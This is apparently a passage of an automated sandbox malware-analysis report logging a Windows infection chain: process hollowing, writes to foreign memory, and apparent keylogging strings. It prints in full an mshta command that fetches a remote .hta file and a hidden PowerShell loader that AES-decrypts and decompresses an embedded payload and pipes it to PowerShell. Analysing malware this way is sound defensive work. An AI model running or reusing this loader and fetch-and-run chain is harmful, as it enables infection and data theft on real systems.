                    Source: C:\Users\user\AppData\Roaming\uc.exeMemory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeMemory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 1E090000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFMemory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 400000 protect: page execute and read and write
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFMemory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 121D0000 protect: page execute and read and write
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFMemory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 400000 protect: page execute and read and write
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFMemory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 1E090000 protect: page execute and read and write
                    Sample uses process hollowing technique
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection unmapped: C:\Users\Public\Libraries\bwsiuvcU.pif base address: 400000Jump to behavior
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFSection unmapped: C:\Users\Public\Libraries\bwsiuvcU.pif base address: 400000
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFSection unmapped: C:\Users\Public\Libraries\bwsiuvcU.pif base address: 400000
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Roaming\uc.exeMemory written: C:\Users\Public\Libraries\bwsiuvcU.pif base: 2A5008Jump to behavior
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFMemory written: C:\Users\Public\Libraries\bwsiuvcU.pif base: 211008
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFMemory written: C:\Users\Public\Libraries\bwsiuvcU.pif base: 239008
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.htaJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\uc.exe "C:\Users\user\AppData\Roaming\uc.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeProcess created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pifJump to behavior
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $osfnkdw = 'aaaaaaaaaaaaaaaaaaaaaoega50v5wuo7zhydkcfzbjinq4p3h3rmsqozx56v9ct1bzutrzkwxrchczjinv9leat1ry1wlwkifuszfzqfe/ywmqadzxsneytupy+5le4m5em4w+ywzersnn/urcy8+ztg58q1h/+bzdob3w2o1z7qwzthsnzgxowwnyv7tmyxzckvr/w4wq5ilvqcut+dsc1oheaxo3ndd5i7/vznrbilxsn6hcnaactlxfrinfmskdcn8+7w2lqhnfd5fxx+lgvrrg0ld6mdkv9wdbx6qjfidrmhcmclwuj1bf5mnmwfno28v0dg8ts2l8miodvr6azf2v7aj+0kyrmlbddhywfi7okvra/3xzllb5bbqdqe0oot0jai3+7gtkwesgjwchgeuewtwqamcb6a7qrzrsbpayqu/wal9/nkc9cb9jhujr2itv9ek3kerad+eapojond7bqukjve9tlodwypko7ylwxtqf8wgzm0ja3mfkmwkgljtfbjt7ucygj4klx/zk01swb2yhhmutyge58lhzygfngyycqtkg4k9tn5i5bstesfzehotkeivad+ckvo0hl0r5uz5gqb2ew8dgcuwkpmexzvkk4b1gapu3smbdkvfrvuhgsjc5t6hhsztvvp6jz9v2fjj6ahm37dhgqwqsoihz9dfusra5c/+avs0ho38mgy4fjkp6ou6wm3p9bykwtvtrulafl604cotxxeoc6ge6trnaardid6zmwy1sykkettlg2js0b7n2fwa1gsa==';$jifvezk = 'cfrkugzlwwl4r2zhdlp1wlrocflzr3rfvutmamhetuc=';$ugiwrbah = new-object 'system.security.cryptography.aesmanaged';$ugiwrbah.mode = [system.security.cryptography.ciphermode]::ecb;$ugiwrbah.padding = [system.security.cryptography.paddingmode]::zeros;$ugiwrbah.blocksize = 128;$ugiwrbah.keysize = 256;$ugiwrbah.key = [system.convert]::frombase64string($jifvezk);$vpsle = [system.convert]::frombase64string($osfnkdw);$ubmsttpl = $vpsle[0..15];$ugiwrbah.iv = $ubmsttpl;$clyzavcnc = $ugiwrbah.createdecryptor();$evtppvfwq = $clyzavcnc.transformfinalblock($vpsle, 16, $vpsle.length - 16);$ugiwrbah.dispose();$darjcu = new-object system.io.memorystream( , $evtppvfwq );$wdjfzjy = new-object system.io.memorystream;$mtmsbjehy = new-object system.io.compression.gzipstream $darjcu, ([io.compression.compressionmode]::decompress);$mtmsbjehy.copyto( $wdjfzjy );$mtmsbjehy.close();$darjcu.close();[byte[]] $dvtmfgse = $wdjfzjy.toarray();$ghwdgw = [system.text.encoding]::utf8.getstring($dvtmfgse);$ghwdgw | powershell -
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $osfnkdw = 'aaaaaaaaaaaaaaaaaaaaaoega50v5wuo7zhydkcfzbjinq4p3h3rmsqozx56v9ct1bzutrzkwxrchczjinv9leat1ry1wlwkifuszfzqfe/ywmqadzxsneytupy+5le4m5em4w+ywzersnn/urcy8+ztg58q1h/+bzdob3w2o1z7qwzthsnzgxowwnyv7tmyxzckvr/w4wq5ilvqcut+dsc1oheaxo3ndd5i7/vznrbilxsn6hcnaactlxfrinfmskdcn8+7w2lqhnfd5fxx+lgvrrg0ld6mdkv9wdbx6qjfidrmhcmclwuj1bf5mnmwfno28v0dg8ts2l8miodvr6azf2v7aj+0kyrmlbddhywfi7okvra/3xzllb5bbqdqe0oot0jai3+7gtkwesgjwchgeuewtwqamcb6a7qrzrsbpayqu/wal9/nkc9cb9jhujr2itv9ek3kerad+eapojond7bqukjve9tlodwypko7ylwxtqf8wgzm0ja3mfkmwkgljtfbjt7ucygj4klx/zk01swb2yhhmutyge58lhzygfngyycqtkg4k9tn5i5bstesfzehotkeivad+ckvo0hl0r5uz5gqb2ew8dgcuwkpmexzvkk4b1gapu3smbdkvfrvuhgsjc5t6hhsztvvp6jz9v2fjj6ahm37dhgqwqsoihz9dfusra5c/+avs0ho38mgy4fjkp6ou6wm3p9bykwtvtrulafl604cotxxeoc6ge6trnaardid6zmwy1sykkettlg2js0b7n2fwa1gsa==';$jifvezk = 'cfrkugzlwwl4r2zhdlp1wlrocflzr3rfvutmamhetuc=';$ugiwrbah = new-object 'system.security.cryptography.aesmanaged';$ugiwrbah.mode = [system.security.cryptography.ciphermode]::ecb;$ugiwrbah.padding = [system.security.cryptography.paddingmode]::zeros;$ugiwrbah.blocksize = 128;$ugiwrbah.keysize = 256;$ugiwrbah.key = [system.convert]::frombase64string($jifvezk);$vpsle = [system.convert]::frombase64string($osfnkdw);$ubmsttpl = $vpsle[0..15];$ugiwrbah.iv = $ubmsttpl;$clyzavcnc = $ugiwrbah.createdecryptor();$evtppvfwq = $clyzavcnc.transformfinalblock($vpsle, 16, $vpsle.length - 16);$ugiwrbah.dispose();$darjcu = new-object system.io.memorystream( , $evtppvfwq );$wdjfzjy = new-object system.io.memorystream;$mtmsbjehy = new-object system.io.compression.gzipstream $darjcu, ([io.compression.compressionmode]::decompress);$mtmsbjehy.copyto( $wdjfzjy );$mtmsbjehy.close();$darjcu.close();[byte[]] $dvtmfgse = $wdjfzjy.toarray();$ghwdgw = [system.text.encoding]::utf8.getstring($dvtmfgse);$ghwdgw | powershell -Jump to behavior
                    Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
                    Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q8<b>[ Program Manager]</b> (24/04/2024 13:36:37)<br>{Win}TH
                    Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q9<b>[ Program Manager]</b> (24/04/2024 13:36:37)<br>{Win}rTH
                    Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-
                    Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q3<b>[ Program Manager]</b> (24/04/2024 13:36:37)<br>
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,19_2_0299D5D0
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,19_2_02985A90
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: GetLocaleInfoA,19_2_0298A780
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: GetLocaleInfoA,19_2_0298A7CC
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,19_2_02985B9C
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,19_2_0299D5D0
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,19_2_029A5FA0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: GetLocaleInfoA,23_2_00417A20
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: GetLocaleInfoA,23_1_00417A20
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFCode function: WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,24_2_028BD5D0
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,24_2_028A5A90
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFCode function: GetLocaleInfoA,24_2_028AA7CC
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,24_2_028A5B9B
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFCode function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,24_2_028C5F9F
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: GetLocaleInfoA,25_2_00417A20
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
